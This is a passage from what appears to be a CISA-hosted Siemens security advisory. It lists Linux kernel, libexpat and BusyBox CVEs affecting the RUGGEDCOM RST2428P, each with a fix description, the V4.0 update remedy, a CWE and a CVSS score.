<p>In the Linux kernel, the following vulnerability has been resolved: pnfs/flexfiles: Fix memory leak in nfs4_ff_alloc_deviceid_node() In nfs4_ff_alloc_deviceid_node(), if the allocation for ds_versions fails, the function jumps to the out_scratch label without freeing the already allocated dsaddrs list, leading to a memory leak. Fix this by jumping to the out_err_drain_dsaddrs label, which properly frees the dsaddrs list before cleaning up other resources.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23038">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23111</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: fix inverted genmask check in nft_map_catchall_activate() nft_map_catchall_activate() has an inverted element activity check compared to its non-catchall counterpart nft_mapelem_activate() and compared to what is logically required. nft_map_catchall_activate() is called from the abort path to re-activate catchall map elements that were deactivated during a failed transaction. It should skip elements that are already active (they don't need re-activation) and process elements that are inactive (they need to be restored). Instead, the current code does the opposite: it skips inactive elements and processes active ones. Compare the non-catchall activate callback, which is correct: nft_mapelem_activate(): if (nft_set_elem_active(ext, iter-&gt;genmask)) return 0; /* skip active, process inactive */ With the buggy catchall version: nft_map_catchall_activate(): if (!nft_set_elem_active(ext, genmask)) continue; /* skip inactive, process active */ The consequence is that when a DELSET operation is aborted, nft_setelem_data_activate() is never called for the catchall element. For NFT_GOTO verdict elements, this means nft_data_hold() is never called to restore the chain-&gt;use reference count. Each abort cycle permanently decrements chain-&gt;use. Once chain-&gt;use reaches zero, DELCHAIN succeeds and frees the chain while catchall verdict elements still reference it, resulting in a use-after-free. This is exploitable for local privilege escalation from an unprivileged user via user namespaces + nftables on distributions that enable CONFIG_USER_NS and CONFIG_NF_TABLES. Fix by removing the negation so the check matches nft_mapelem_activate(): skip active elements, process inactive ones.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23111">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23112</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: nvmet-tcp: add bounds checks in nvmet_tcp_build_pdu_iovec nvmet_tcp_build_pdu_iovec() could walk past cmd-&gt;req.sg when a PDU length or offset exceeds sg_cnt and then use bogus sg-&gt;length/offset values, leading to _copy_to_iter() GPF/KASAN. Guard sg_idx, remaining entries, and sg-&gt;length/offset before building the bvec.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23112">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23220</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix infinite loop caused by next_smb2_rcv_hdr_off reset in error paths The problem occurs when a signed request fails smb2 signature verification check. In __process_request(), if check_sign_req() returns an error, set_smb2_rsp_status(work, STATUS_ACCESS_DENIED) is called. set_smb2_rsp_status() set work-&gt;next_smb2_rcv_hdr_off as zero. By resetting next_smb2_rcv_hdr_off to zero, the pointer to the next command in the chain is lost. Consequently, is_chained_smb2_message() continues to point to the same request header instead of advancing. If the header's NextCommand field is non-zero, the function returns true, causing __handle_ksmbd_work() to repeatedly process the same failed request in an infinite loop. This results in the kernel log being flooded with "bad smb2 signature" messages and high CPU usage. This patch fixes the issue by changing the return value from SERVER_HANDLER_CONTINUE to SERVER_HANDLER_ABORT. This ensures that the processing loop terminates immediately rather than attempting to continue from an invalidated offset.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23220">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/835.html">CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23222</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: crypto: omap - Allocate OMAP_CRYPTO_FORCE_COPY scatterlists correctly The existing allocation of scatterlists in omap_crypto_copy_sg_lists() was allocating an array of scatterlist pointers, not scatterlist objects, resulting in a 4x too small allocation. Use sizeof(*new_sg) to get the correct object size.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23222">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23228</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: smb: server: fix leak of active_num_conn in ksmbd_tcp_new_connection() On kthread_run() failure in ksmbd_tcp_new_connection(), the transport is freed via free_transport(), which does not decrement active_num_conn, leaking this counter. Replace free_transport() with ksmbd_tcp_disconnect().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23228">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23229</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: crypto: virtio - Add spinlock protection with virtqueue notification When VM boots with one virtio-crypto PCI device and builtin backend, run openssl benchmark command with multiple processes, such as openssl speed -evp aes-128-cbc -engine afalg -seconds 10 -multi 32 openssl processes will hangup and there is error reported like this: virtio_crypto virtio0: dataq.0:id 3 is not a head! It seems that the data virtqueue need protection when it is handled for virtio done notification. If the spinlock protection is added in virtcrypto_done_task(), openssl benchmark with multiple processes works well.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23229">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/820.html">CWE-820 Missing Synchronization</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23230</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: smb: client: split cached_fid bitfields to avoid shared-byte RMW races is_open, has_lease and on_list are stored in the same bitfield byte in struct cached_fid but are updated in different code paths that may run concurrently. Bitfield assignments generate byte read–modify–write operations (e.g. `orb $mask, addr` on x86_64), so updating one flag can restore stale values of the others. A possible interleaving is: CPU1: load old byte (has_lease=1, on_list=1) CPU2: clear both flags (store 0) CPU1: RMW store (old | IS_OPEN) -&gt; reintroduces cleared bits To avoid this class of races, convert these flags to separate bool fields.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23230">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23231</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: fix use-after-free in nf_tables_addchain() nf_tables_addchain() publishes the chain to table-&gt;chains via list_add_tail_rcu() (in nft_chain_add()) before registering hooks. If nf_tables_register_hook() then fails, the error path calls nft_chain_del() (list_del_rcu()) followed by nf_tables_chain_destroy() with no RCU grace period in between. This creates two use-after-free conditions: 1) Control-plane: nf_tables_dump_chains() traverses table-&gt;chains under rcu_read_lock(). A concurrent dump can still be walking the chain when the error path frees it. 2) Packet path: for NFPROTO_INET, nf_register_net_hook() briefly installs the IPv4 hook before IPv6 registration fails. Packets entering nft_do_chain() via the transient IPv4 hook can still be dereferencing chain-&gt;blob_gen_X when the error path frees the chain. Add synchronize_rcu() between nft_chain_del() and the chain destroy so that all RCU readers -- both dump threads and in-flight packet evaluation -- have finished before the chain is freed.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23231">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23236</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: fbdev: smscufx: properly copy ioctl memory to kernelspace The UFX_IOCTL_REPORT_DAMAGE ioctl does not properly copy data from userspace to kernelspace, and instead directly references the memory, which can cause problems if invalid data is passed from userspace. Fix this all up by correctly copying the memory before accessing it within the kernel.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23236">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.3</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23238</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: romfs: check sb_set_blocksize() return value romfs_fill_super() ignores the return value of sb_set_blocksize(), which can fail if the requested block size is incompatible with the block device's configuration. This can be triggered by setting a loop device's block size larger than PAGE_SIZE using ioctl(LOOP_SET_BLOCK_SIZE, 32768), then mounting a romfs filesystem on that device. When sb_set_blocksize(sb, ROMBSIZE) is called with ROMBSIZE=4096 but the device has logical_block_size=32768, bdev_validate_blocksize() fails because the requested size is smaller than the device's logical block size. sb_set_blocksize() returns 0 (failure), but romfs ignores this and continues mounting. The superblock's block size remains at the device's logical block size (32768). Later, when sb_bread() attempts I/O with this oversized block size, it triggers a kernel BUG in folio_set_bh(): kernel BUG at fs/buffer.c:1582! BUG_ON(size &gt; PAGE_SIZE); Fix by checking the return value of sb_set_blocksize() and failing the mount with -EINVAL if it returns 0.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23238">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-24515</a></h3>
<div class="csaf-accordion-content">
<p>In libexpat before 2.7.4, XML_ExternalEntityParserCreate does not copy unknown encoding handler user data.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-24515">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>2.9</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-25210</a></h3>
<div class="csaf-accordion-content">
<p>In libexpat before 2.7.4, the doContent function does not properly determine the buffer size bufSize because there is no integer overflow check for tag buffer reallocation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-25210">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.9</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L">CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-26157</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in BusyBox. Incomplete path sanitization in its archive extraction utilities allows an attacker to craft malicious archives that when extracted, and under specific conditions, may write to files outside the intended directory. This can lead to arbitrary file overwrite, potentially enabling code execution through the modification of sensitive system files.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-26157">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
